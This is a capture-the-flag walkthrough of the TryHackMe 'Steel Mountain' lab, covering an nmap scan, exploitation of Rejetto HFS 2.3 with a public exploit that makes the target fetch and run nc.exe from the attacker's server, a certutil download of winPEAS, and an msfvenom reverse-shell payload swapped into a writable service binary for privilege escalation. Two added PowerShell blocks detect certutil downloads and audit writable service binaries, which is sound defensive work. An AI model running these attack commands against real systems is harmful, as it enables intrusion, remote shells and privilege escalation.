# TryHackMe - Steel Mountain

## Nmap
```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-26 23:25 PKT
Stats: 0:02:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining)
Stats: 0:02:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 23:27 (0:00:00 remaining)
Nmap scan report for 10.10.252.157
Host is up (0.18s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
|_ssl-date: 2020-10-26T18:26:37+00:00; 0s from scanner time.
8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49163/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:84:f3:74:2b:f5 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-10-26T18:26:30
|_  start_date: 2020-10-26T18:21:06
```
## Port 80

Who is the employee of the month?

Visit the web page on port 80, then view the page source: the image file name is the answer to the question.
Scan the machine with nmap. What is the other port running a web server on?

Port 8080

## Port 8080

Clicking the HttpFileServer 2.3 link at the bottom of the page redirects you to another page.
Take a look at the other web server. What file server is running?
Rejetto Http File Server
What is the CVE number to exploit this file server?
Now we know that it is running Rejetto HTTP File Server version 2.3, so let's search for exploits for it with searchsploit. Let's try this one:

https://www.exploit-db.com/exploits/39161

Change the local IP in the exploit, and the local port if you want; leaving it at the default port 443 works just as well.
Now host nc.exe on your local machine. It can be downloaded from GitHub (https://github.com/int0x33/nc.exe/blob/master/nc.exe) or, if you are using Kali Linux, it is already available at /usr/share/windows-resources/binaries/nc.exe.

You can host the file with Python's built-in HTTP server, but keep it on port 80 because that is the default HTTP port:

```
python3 -m http.server 80
```

Also set up a netcat listener:

```
nc -lvp [port]
```

Run the exploit against the target's HFS port (the exploit takes the target address and port; the address is the one from the nmap scan):

```
python2 39161.py 10.10.252.157 8080
```

Run it twice: the first run only makes the target download nc.exe, the second run executes it.
Now upload winPEAS.exe to the machine: host the file locally, then download it on the target.
```
C:\Users\bill\Desktop>certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe
certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\Users\bill\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A

 Directory of C:\Users\bill\Desktop

10/26/2020  02:31 PM    <DIR>          .
10/26/2020  02:31 PM    <DIR>          ..
10/26/2020  01:57 PM           600,580 PowerUp.ps1
09/27/2019  05:42 AM                70 user.txt
10/26/2020  02:31 PM           472,064 winpeas.exe
               3 File(s)      1,072,714 bytes
               2 Dir(s)  44,155,019,264 bytes free

C:\Users\bill\Desktop>
```
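The certutil.exe -urlcache download above is a well-known living-off-the-land pattern that defenders alert on. As an added example (not part of the original writeup), the following PowerShell function flags such command lines in process-creation records; the sample events are constructed to mirror the transcript, and the whitespace tokeniser is an assumption about how the command lines are logged.

```powershell
# Added example, not part of the original writeup: flag certutil.exe being used as a
# downloader, the way this walkthrough fetches winPEAS onto the target. The sample
# records are constructed stand-ins for process-creation events (Sysmon Event ID 1 /
# Security 4688); on a real host, feed Get-WinEvent command lines into the same function.

function Test-CertutilDownload {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Tokenise on whitespace while keeping quoted paths together. certutil accepts
    # switches with either '-' or '/' and ignores case (the target echoed "-URLCache").
    $tokens = @([regex]::Matches($CommandLine, '"[^"]*"|\S+') | ForEach-Object { $_.Value.Trim('"') })
    if ($tokens.Count -eq 0) { return $false }
    $exe = [System.IO.Path]::GetFileName($tokens[0]).ToLowerInvariant()
    if ($exe -notin @('certutil', 'certutil.exe')) { return $false }
    $hasUrlCache = $tokens | Where-Object { $_ -match '^[-/]urlcache$' }
    $hasUrl      = $tokens | Where-Object { $_ -match '^(https?|ftp)://' }
    # "certutil -urlcache * delete" (cache cleanup) carries no URL and is not flagged.
    return [bool]($hasUrlCache -and $hasUrl)
}

# Constructed sample events: the first two mirror the transcript, the last two are benign.
$SampleEvents = @(
    [PSCustomObject]@{ Host = 'STEELMOUNTAIN'; User = 'STEELMOUNTAIN\bill'
                       CommandLine = 'certutil.exe -urlcache -f http://10.14.3.143:80/winPEAS.exe winpeas.exe' }
    [PSCustomObject]@{ Host = 'STEELMOUNTAIN'; User = 'STEELMOUNTAIN\bill'
                       CommandLine = '"C:\Windows\System32\certutil.exe" /URLCache /f http://10.14.3.143/nc.exe nc.exe' }
    [PSCustomObject]@{ Host = 'WS01'; User = 'CORP\alice'; CommandLine = 'certutil -urlcache * delete' }
    [PSCustomObject]@{ Host = 'WS01'; User = 'CORP\alice'; CommandLine = 'certutil -dump C:\temp\cert.cer' }
)

$SampleEvents | Where-Object { Test-CertutilDownload $_.CommandLine } |
    Select-Object Host, User, CommandLine | Format-Table -Wrap
```

Only the two STEELMOUNTAIN records are reported; the cache cleanup and the certificate dump pass through unflagged.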
Now simply run `.\winpeas.exe`.

We can see that the AdvancedSystemCareService9 service can be exploited, so let's generate a payload named ASCService.exe:

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe
```

Set up the netcat listener and stop the service, then upload the payload to the target machine and start the service again.

Stopping the service:
```
C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
```
Starting the service
## Metasploit

Now we want to escalate our privileges to root, so we will run PowerUp.ps1, a PowerShell script that looks for misconfigurations on the target Windows machine.

To get a PowerShell prompt, first run `load powershell` in the Meterpreter session, then `powershell_shell`.

Run `. .\PowerUp.ps1` and then `Invoke-AllChecks`.

Now look for a service with CanRestart set to True; its name is AdvancedSystemCareService9.
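The weakness that winPEAS and PowerUp report here is a service whose executable a low-privileged user can replace and whose service can then be restarted. As an added example (not from the original writeup or from PowerUp), the following PowerShell audits every service on a host for that condition; the trusted-identity baseline, the generic-right bits folded into the mask and the way the executable is parsed out of the ImagePath are assumptions.

```powershell
# Added example, not part of the original writeup: list service executables that
# identities other than SYSTEM, Administrators or TrustedInstaller can modify. That is
# the condition winPEAS and PowerUp (CanRestart = True) report for
# AdvancedSystemCareService9 on Steel Mountain: a user who can overwrite the binary and
# restart the service runs code as the service account. Run from an elevated prompt.

# Identities whose write access to a service binary is expected (assumed baseline).
$TrustedWriters = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
# Any of these rights lets the holder replace or alter the executable; GENERIC_ALL and
# GENERIC_WRITE (0x10000000, 0x40000000) are added because some ACEs carry generic bits.
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions' -bor 0x10000000 -bor 0x40000000

function Get-ServiceBinaryPath {
    param([string]$ImagePath)
    # Quoted path: take the quoted part. Unquoted: take everything up to ".exe" so that
    # paths containing spaces are kept whole; fall back to the first token otherwise.
    if ($ImagePath -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($ImagePath -match '^\s*(.+?\.exe)\b') { return $Matches[1] }
    return ($ImagePath.Trim() -split '\s+')[0]
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if ([string]::IsNullOrWhiteSpace($svc.PathName)) { continue }
    $exe = Get-ServiceBinaryPath $svc.PathName
    if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
    $acl = Get-Acl -LiteralPath $exe
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
        if ($TrustedWriters -contains $ace.IdentityReference.Value) { continue }
        [PSCustomObject]@{
            Service   = $svc.Name
            RunsAs    = $svc.StartName      # LocalSystem means a writable binary yields SYSTEM
            StartMode = $svc.StartMode
            Binary    = $exe
            Writer    = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            # An unquoted path with spaces is a separate, related weakness worth fixing too.
            Unquoted  = ($svc.PathName -notmatch '^\s*"' -and $exe -match '\s')
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize -Wrap }
else { 'No service binaries are writable by non-administrative identities.' }
```

Remediation is to tighten the DACL on the reported binary (and its directory) so only administrators can write, and to quote any ImagePath the report marks as Unquoted.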
Now generate a payload named ASCService.exe:

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.14.3.143 LPORT=6666 -e x86/shikata_ga_nai -f exe -o ASCService.exe
```

Set up the netcat listener and stop the service, then upload the payload to the target machine and start the service again, exactly as in the winPEAS section above.